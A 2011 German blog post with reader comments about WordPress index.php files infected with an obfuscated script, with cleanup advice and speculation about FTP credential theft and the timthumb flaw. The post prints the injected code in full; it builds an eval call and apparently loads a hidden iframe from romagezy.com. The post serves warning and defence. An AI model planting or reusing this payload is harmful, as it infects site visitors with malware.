03Aug Vorsicht! Infizierte WordPress index.php Dateien laden Trojaner
Wie ich heute festgestellt habe, wurden zwei meiner Blogs mit Schadcode infiziert. In allen index.php Dateien wurde ein verschlüsselter Code eingeschleust.
Dieser Code lädt weitere Daten von der Seite romagezy.com nach. Das Laden der Blogs dauerte extrem lange und der Browser zeigt die Url romagezy.com an.
<code><!– ad –><script>v=document.createTextNode(‘asd’);var s;if(v.nodeName==’#text’)b=1;b*=2;aa=document.createTextNode(“ev”+”al”);e=window[aa.nodeValue];e(String.fromCharCode(11-b,11-b,107-b,104-b,34-b,42-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b,100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,43-b,125-b,11-b,11-b,11-b,107-b,104-b,116-b,99-b,111-b,103-b,116-b,42-b,43-b,61-b,11-b,11-b,127-b,34-b,103-b,110-b,117-b,103-b,34-b,125-b,11-b,11-b,11-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,121-b,116-b,107-b,118-b,103-b,42-b,36-b,62-b,107-b,104-b,116-b,99-b,111-b,103-b,34-b,117-b,116-b,101-b,63-b,41-b,106-b,118-b,118-b,114-b,60-b,49-b,49-b,116-b,113-b,111-b,99-b,105-b,103-b,124-b,123-b,48-b,101-b,113-b,111-b,49-b,111-b,99-b,101-b,113-b,117-b,51-b,49-b,103-b,112-b,118-b,103-b,116-b,48-b,114-b,106-b,114-b,41-b,34-b,121-b,107-b,102-b,118-b,106-b,63-b,41-b,51-b,50-b,41-b,34-b,106-b,103-b,107-b,105-b,106-b,118-b,63-b,41-b,51-b,50-b,41-b,34-b,117-b,118-b,123-b,110-b,103-b,63-b,41-b,120-b,107-b,117-b,107-b,100-b,107-b,110-b,107-b,118-b,123-b,60-b,106-b,107-b,102-b,102-b,103-b,112-b,61-b,114-b,113-b,117-b,107-b,118-b,107-b,113-b,112-b,60-b,99-b,100-b,117-b,113-b,110-b,119-b,118-b,103-b,61-b,110-b,103-b,104-b,118-b,60-b,50-b,61-b,118-b,113-b,114-b,60-b,50-b,61-b,41-b,64-b,62-b,49-b,107-b,104-b,116-b,99-b,111-b,103-b,64-b,36-b,43-b,61-b,11-b,11-b,127-b,11-b,11-b,104-b,119-b,112-b,101-b,118-b,107-b,113-b,112-b,34-b,107-b,104-b,116-b,99-b,111-b,103-b,116-b,42-b,43-b,125-b,11-b,11-b,11-b,120-b,99-b,116-b,34-b,104-b,34-b,63-b,34-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,101-b,116-b,103-b,99-b,118-b,103-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,42-b,41-b,107-b,104-b,116-b,99-b,111-b,103-b,41-b,43-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,117-b,116-b,101-b,41-b,46-b,41-b,106-b,118-b,118-b,114-b,60-b,49-b,49-b,116-b,113-b,111-b,99-b,105-b,103-b,124-b,123-b,48-b,101-b,113-b,111-b,49-b,111-b,99-b,101-b,113-b,117-b,51-b,49-b,103-b,112-b,118-b,103-b,116-b,48-b,114-b,106-b,114-b,41-b,43-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,120-b,107-b,117-b,107-b,100-b,107-b,110-b,107-b,118-b,123-b,63-b,41-b,106-b,107-b,102-b,102-b,103-b,112-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,114-b,113-b,117-b,107-b,118-b,107-b,113-b,112-b,63-b,41-b,99-b,100-b,117-b,113-b,110-b,119-b,118-b,103-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,110-b,103-b,104-b,118-b,63-b,41-b,50-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,118-b,113-b,114-b,63-b,41-b,50-b,41-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,121-b,107-b,102-b,118-b,106-b,41-b,46-b,41-b,51-b,50-b,41-b,43-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,106-b,103-b,107-b,105-b,106-b,118-b,41-b,46-b,41-b,51-b,50-b,41-b,43-b,61-b,11-b,11-b,11-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b,100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,48-b,99-b,114-b,114-b,103-b,112-b,102-b,69-b,106-b,107-b,110-b,102-b,42-b,104-b,43-b,61-b,11-b,11-b,127-b));</script><!– /ad –></code>
Stutzig wurde ich heute bereits, als der Avast Virenscanner beim Aufruf meiner Blogs einen Trojaner meldete.
Wer ebenfalls betroffen ist, sollte eine Datenbank-Sicherung durchführen und dann folgende Schritte tun.
- FTP Passwort ändern
- index.php Dateien , auch die in den Templates mit den Originalen ersetzen.
- Dateiattribute index.php auf “444″ setzen.
- Plugin Ordner nicht vergessen
Wie der Angreiffer diesen Code einschleusen konnte, habe ich noch nicht rausgefunden.
WordPress Version 3.0.4 und 3.2.1
- WordPress – SEO Tipps
- WordPress Plugin: Aufbau eines Shops mit CSV Daten von Affili.net
- WordPress PageRank Sculpting – Linkpower optimal verteilen
August 3rd, 2011 at 05:37
Zufällig timthumb hier im Einsatz?
August 3rd, 2011 at 10:03
Den Angriff hatte ich gestern auch, es wurde per FTP eingestiegen (keine Passwortattacke, direktes Login) und diverse index.php, index.html sowie andere Kandidaten (main.php) geändert. Ich habe noch keine Idee woher der Angreifer das Passwort hatte…
August 4th, 2011 at 06:25
Hallo,
diese Seite hier war die erste und einzige, die mich auf dieses Problem hingewiesen hat. Ich habe kein WordPress im Einsatz, trotzdem sind auf meinem Webspace alle Seiten, bis auf wenige Ausnahmen, mit diesem Code verseucht. Ich habe alle nicht nötigen Seiten gelöscht und die wichtigen per Hand gesäubert. Jetzt muss ich noch mein Forum, welches auf phpBB basiert, säubern und dann ist diese Sache hoffentlich passé!
Und das, obwohl mein Provider Ende letzten Monats groß Werbung gemacht hat, dass sie ein neues Sicherheitssystem jetzt im Einsatz haben:/
Viele Grüße
Markus
August 4th, 2011 at 16:34
Hab Meldungen gelesen, dass bei einigen die Dateien über FTP geändert wurden mit nur einem Zugriffs Versuch. Scanne den PC auf Viren/Trojaner.
Ich vermute stark, dasw ein Trojaner meine FTP Passwörter ausspioniert hat, die ich bisher im FTP Programm gespeichert hatte.
October 25th, 2011 at 21:04
Wie bekommt man den Trojaner widwr weg?
October 31st, 2011 at 11:37
Wer ebenfalls betroffen ist, sollte eine Datenbank-Sicherung durchführen und dann folgende Schritte tun.
FTP Passwort ändern
index.php Dateien , auch die in den Templates mit den Originalen ersetzen.
Dateiattribute index.php auf “444″ setzen.
Plugin Ordner nicht vergessen
December 8th, 2011 at 18:29
Ich muss mich bei dir tausend mal bedanken. Und auch super, dass Google dich gefunden hat. Ich hatte genau das gleiche Problem und du hast mir geholfen. Echt eine Schweinerei diese Trojaner.
Gruß
December 9th, 2011 at 21:47
und die Zeit die damit immer draufgeht wo man besseres machen könnte
February 1st, 2012 at 11:34
Hallo Danke für die Ausführung denn ich habe gerade ein Problem mit einer WordPress Seite. Ein Besucher beescheid gegeben, dass das Virenprogramm Kapersky die Seite gesperrt hatte wegen Trojaner verdacht.
1. Das Google Webmaster Tools erkennt allerdings nichts, hier ist alles i.O.
“Google hat keine Malware auf dieser Website gefunden.”
2. http://www.urlvoid.com/ zeigt mir nach Analse “CLEAN” an
3. http://vscan.novirusthanks.org auch hier “Clean”
4. http://online.us.drweb.com auch hier “Clean”
5. Allerdings zeigt mir das Tool http://wepawet.cs.ucsb.edu folgendes an:
Result suspicious …
Redirekt http:// gone.com.au.mn/in.cgi?2 302 text/html
Redirects
From To
http:// gone.com.au.mn/in.cgi?2 http:// 4flu.in/index.php?showtopic=651496
—
Die große Frage ist was nun!? es handelt sich um folgende Seite
http://frauenarzt-berlin-prenzlauer-berg.de/
Gruß Matthias
February 13th, 2012 at 05:03
Hatte anderen Schadcode, aber auch über FTP. Wenn ihr filezilla benutzt, würde ich empfehlen, die passwörter nicht über fz zu speichern, weil sie als plain text in einer XML-Datei gespeichert werden.
Hab diverse virenscans über meinen rechner laufen lassen, aber keine trojaner o.ä. finden können. Das Problem muss aber an FTP liegen, weil verschiedenste websites den Schadcode in der index.php hatten.
Ich frag mich auch immer wieder, wieso kriminelle sowas so offen machen können. Da setzt einer ne Website mit Trojanern auf, hackt tausende Websites und muss keinerlei Strafe fürchten? Total krass…
February 13th, 2012 at 13:03
wer Windows nutzt kann sich schon mal einen Trojaner einfangen, auch mit ner guten Antiviren-Software.
Dann gibt es so gen. Rootkits und noch andere die manche Virensoft nicht erkennt.
Ich steige jetzt auf Ubuntu um (Linux) da ich auch schon einige Trojaner auf meinem PC hatte und es erst nach paar Wochen bemerkt.
Dann ist Schluß mit dem Zeug…
February 20th, 2012 at 00:44
Hallo, mit dem gleichen Problem hatte ich auch zu kämpfen. Insgesamt infizierten sich 10 meiner Blogs und ich wusste nicht von wo der Angreifer kam. Da ich mich einige Jahre sehr intensiv mit Internet Security befasst hatte, musste ich der Sache auf den Grund gehen. Vor einem halben Jahr wurde eine Lücke in WordPress festgestellt. Die Datei heisst timthumb.php und ermöglicht es dem Angreifer einen Remote Shell auf den Server raufzuladen und einige Dateien zu manipulieren. Diese Thimthumb datei dient soweit ich noch in Erinnerung habe zur Anpassung der Bilder in einem Template. Diese Datei ist fast in jedem WordPress Template enthalten. Sprich => Grosses Risiko denn 40 % der Internetseiten basieren heutzutage auf WordPress. Da haben sich einige Hacker ran gemacht und einen Shell code entwickelt der auf einer Shell Console ausgeführt werden kann und mit wenigen Befehlen dazu dient den Schadcode in der Indexdatei zu platzieren. Hier noch ein Video wie der ganze Angriff zustande kommt : => http://www.youtube.com/watch?v=yIjjHByz9Pc
Wie kann man seinen Blog dagegen schützen :
Ganz einfach man sollte das Plugin Timthumb Vulnerability Scanner runterladen ausführen und er findet und behebt die Lücke.
Für die Seiten die schon von dem Virus betroffen sind : Alle WordPress Files mit der neusten Version aktualisieren. Das Template genauso aktualisieren sprich Original Template wieder auf das aktuelle Template per FTP raufladen und überschreiben. Danach
Timthumb Vulnerability Scanner als plugin im Admin Panel runterladen und ausführen.
Liebe Grüsse und Super Blog !
Pekent Durmaz
March 23rd, 2012 at 22:45
[...] WordPress Trojaner index.php – http://www.gogozone.de/blog/wordpress-index-php-datei-trojaner-275/ [...]